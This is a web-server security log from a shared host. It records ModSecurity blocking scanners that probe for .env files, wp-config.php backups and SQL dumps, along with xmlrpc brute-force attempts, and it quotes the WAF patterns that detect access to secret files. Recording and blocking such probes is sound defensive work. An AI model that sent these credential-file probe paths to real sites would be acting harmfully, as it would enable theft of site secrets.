[Tue May 26 13:39:45.806476 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/.env"] [unique_id "ahVVSer_-FTveSGlx1HsFAAAANc"]
[Tue May 26 13:39:45.807978 2026] [security2:error] [pid 536875:tid 537012] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/html/.env"] [unique_id "ahVVSer_-FTveSGlx1HsFQAAAIw"]
[Tue May 26 13:39:45.851724 2026] [security2:error] [pid 544395:tid 544630] [client 45.148.10.95:39958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/web/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK5AAAAGk"]
[Tue May 26 13:39:45.956867 2026] [security2:error] [pid 536875:tid 537014] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/website/.env"] [unique_id "ahVVSer_-FTveSGlx1HsHQAAAI4"]
[Tue May 26 13:39:45.996320 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.95:39920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVVSRmrs7g3RMCdp8XK8AAAAFs"]
[Tue May 26 13:39:45.998946 2026] [security2:error] [pid 544395:tid 544563] [client 45.148.10.95:39958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVVSRmrs7g3RMCdp8XK8QAAACY"]
[Tue May 26 13:39:46.012073 2026] [security2:error] [pid 536875:tid 537104] [client 45.148.10.95:40022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.new"] [unique_id "ahVVSur_-FTveSGlx1HsHwAAAOg"]
[Tue May 26 13:39:46.015038 2026] [security2:error] [pid 536875:tid 537106] [client 45.148.10.95:39974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVVSur_-FTveSGlx1HsIQAAAOo"]
[Tue May 26 13:39:46.035782 2026] [security2:error] [pid 544395:tid 544650] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVVShmrs7g3RMCdp8XK9AAAAH0"]
[Tue May 26 13:39:46.735301 2026] [security2:error] [pid 536875:tid 537029] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVSur_-FTveSGlx1HsIgAAAJ0"]
[Tue May 26 13:39:46.862106 2026] [security2:error] [pid 544395:tid 544566] [client 172.86.76.182:63686] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVShmrs7g3RMCdp8XLAwAAACk"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:47.127658 2026] [core:error] [pid 544395:tid 544624] [client 205.210.31.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:39:47.127683 2026] [core:error] [pid 544395:tid 544624] [client 205.210.31.20:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:39:48.329391 2026] [fcgid:warn] [pid 536875:tid 537079] (70014)End of file found: [client 199.45.155.82:55240] mod_fcgid: can't get data from http client
[Tue May 26 13:39:50.469785 2026] [security2:error] [pid 536875:tid 537071] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVTer_-FTveSGlx1HsSgAAAMc"]
[Tue May 26 13:39:51.550964 2026] [security2:error] [pid 544395:tid 544613] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVTxmrs7g3RMCdp8XLUwAAAFg"]
[Tue May 26 13:39:53.040405 2026] [fcgid:warn] [pid 544395:tid 544622] (70014)End of file found: [client 167.94.146.61:55282] mod_fcgid: can't get data from http client
[Tue May 26 13:39:53.337199 2026] [security2:error] [pid 544395:tid 544633] [client 106.192.248.115:62728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLcgAAAGw"]
[Tue May 26 13:39:53.337387 2026] [security2:error] [pid 544395:tid 544633] [client 106.192.248.115:62728] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLcgAAAGw"]
[Tue May 26 13:39:53.421829 2026] [security2:error] [pid 544395:tid 544580] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVUBmrs7g3RMCdp8XLagAAADc"]
[Tue May 26 13:39:53.656588 2026] [security2:error] [pid 544395:tid 544425] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLfgAAaB0"]
[Tue May 26 13:39:53.656748 2026] [security2:error] [pid 544395:tid 544629] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLfgAAaB0"]
[Tue May 26 13:39:53.748700 2026] [security2:error] [pid 544395:tid 544590] [client 129.222.147.134:40366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLewAAAEE"]
[Tue May 26 13:39:53.748896 2026] [security2:error] [pid 544395:tid 544590] [client 129.222.147.134:40366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVURmrs7g3RMCdp8XLewAAAEE"]
[Tue May 26 13:39:54.769987 2026] [security2:error] [pid 544395:tid 544632] [client 65.21.124.77:34540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-privacy.php"] [unique_id "ahVVUhmrs7g3RMCdp8XLmQAAAGs"]
[Tue May 26 13:39:55.102298 2026] [security2:error] [pid 544395:tid 544551] [client 65.21.124.77:34648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-products.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLrQAAABo"]
[Tue May 26 13:39:55.102652 2026] [security2:error] [pid 544395:tid 544567] [client 65.21.124.77:34616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-about.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLsAAAACo"]
[Tue May 26 13:39:55.102686 2026] [security2:error] [pid 544395:tid 544625] [client 65.21.124.77:34600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLrwAAAGQ"]
[Tue May 26 13:39:55.105005 2026] [security2:error] [pid 544395:tid 544615] [client 65.21.124.77:34630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-techdata.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLsgAAAFo"]
[Tue May 26 13:39:55.122185 2026] [security2:error] [pid 544395:tid 544622] [client 65.21.124.77:34692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLtwAAAGE"]
[Tue May 26 13:39:55.123570 2026] [security2:error] [pid 544395:tid 544591] [client 65.21.124.77:34700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLuQAAAEI"]
[Tue May 26 13:39:55.141804 2026] [security2:error] [pid 544395:tid 544535] [client 65.21.124.77:34770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLvQAAAAo"]
[Tue May 26 13:39:55.143496 2026] [security2:error] [pid 544395:tid 544573] [client 65.21.124.77:34778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLvwAAADA"]
[Tue May 26 13:39:55.221408 2026] [security2:error] [pid 544395:tid 544609] [client 65.21.124.77:34848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwQAAAFQ"]
[Tue May 26 13:39:55.221461 2026] [security2:error] [pid 544395:tid 544558] [client 65.21.124.77:34796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-about.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwgAAACE"]
[Tue May 26 13:39:55.223447 2026] [security2:error] [pid 544395:tid 544563] [client 65.21.124.77:34524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLwwAAACY"]
[Tue May 26 13:39:55.233010 2026] [security2:error] [pid 544395:tid 544549] [client 65.21.124.77:34836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-products.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLxgAAABg"]
[Tue May 26 13:39:55.251452 2026] [security2:error] [pid 544395:tid 544623] [client 65.21.124.77:34514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLyAAAAGI"]
[Tue May 26 13:39:55.274457 2026] [security2:error] [pid 544395:tid 544554] [client 65.21.124.77:34628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-terms.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLyQAAAB0"]
[Tue May 26 13:39:55.296796 2026] [security2:error] [pid 536875:tid 537116] [client 65.21.124.77:34714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-services-interiordesign.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiAAAAPQ"]
[Tue May 26 13:39:55.296912 2026] [security2:error] [pid 544395:tid 544648] [client 65.21.124.77:34722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-quote.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLygAAAHs"]
[Tue May 26 13:39:55.296979 2026] [security2:error] [pid 536875:tid 537066] [client 65.21.124.77:34654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HshwAAAMI"]
[Tue May 26 13:39:55.314566 2026] [security2:error] [pid 544395:tid 544578] [client 65.21.124.77:34782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-architecture.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLywAAADU"]
[Tue May 26 13:39:55.337351 2026] [security2:error] [pid 544395:tid 544547] [client 65.21.124.77:34766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-interiordesign.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLzAAAABY"]
[Tue May 26 13:39:55.338039 2026] [security2:error] [pid 536875:tid 537111] [client 65.21.124.77:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-designandbuild.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiQAAAO8"]
[Tue May 26 13:39:55.380344 2026] [security2:error] [pid 536875:tid 537062] [client 65.21.124.77:34820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-techdata.php"] [unique_id "ahVVU-r_-FTveSGlx1HsiwAAAL4"]
[Tue May 26 13:39:55.393402 2026] [security2:error] [pid 536875:tid 537075] [client 65.21.124.77:34798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjAAAAMs"]
[Tue May 26 13:39:55.398601 2026] [security2:error] [pid 544395:tid 544528] [client 65.21.124.77:34556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahVVUxmrs7g3RMCdp8XLzwAAAAM"]
[Tue May 26 13:39:55.436075 2026] [security2:error] [pid 544395:tid 544564] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVUhmrs7g3RMCdp8XLqgAAACc"]
[Tue May 26 13:39:55.447277 2026] [security2:error] [pid 536875:tid 537096] [client 65.21.124.77:34574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-contact.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjgAAAOA"]
[Tue May 26 13:39:55.459587 2026] [security2:error] [pid 544395:tid 544641] [client 65.21.124.77:34668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-services-designandbuild.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0QAAAHQ"]
[Tue May 26 13:39:55.476691 2026] [security2:error] [pid 544395:tid 544642] [client 65.21.124.77:34752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-contact.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0gAAAHU"]
[Tue May 26 13:39:55.539431 2026] [security2:error] [pid 544395:tid 544646] [client 65.21.124.77:34866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL0wAAAHk"]
[Tue May 26 13:39:55.562024 2026] [security2:error] [pid 536875:tid 537042] [client 65.21.124.77:34854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-terms.php"] [unique_id "ahVVU-r_-FTveSGlx1HsjwAAAKo"]
[Tue May 26 13:39:55.607874 2026] [security2:error] [pid 544395:tid 544628] [client 65.21.124.77:34572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/jtc-enquiry.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL1gAAAGc"]
[Tue May 26 13:39:55.639853 2026] [security2:error] [pid 544395:tid 544532] [client 65.21.124.77:34904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2026a-CholaBoardRoom.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL1wAAAAc"]
[Tue May 26 13:39:55.641681 2026] [security2:error] [pid 544395:tid 544636] [client 65.21.124.77:34882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/bhavish-aboutus.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL2AAAAG8"]
[Tue May 26 13:39:55.642918 2026] [security2:error] [pid 544395:tid 544577] [client 65.21.124.77:34888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/2025a-KaizenServApt.php"] [unique_id "ahVVUxmrs7g3RMCdp8XL2QAAADQ"]
[Tue May 26 13:39:55.706110 2026] [security2:error] [pid 536875:tid 537014] [client 65.21.124.77:34812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.124.21.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVVU-r_-FTveSGlx1HskgAAAI4"]
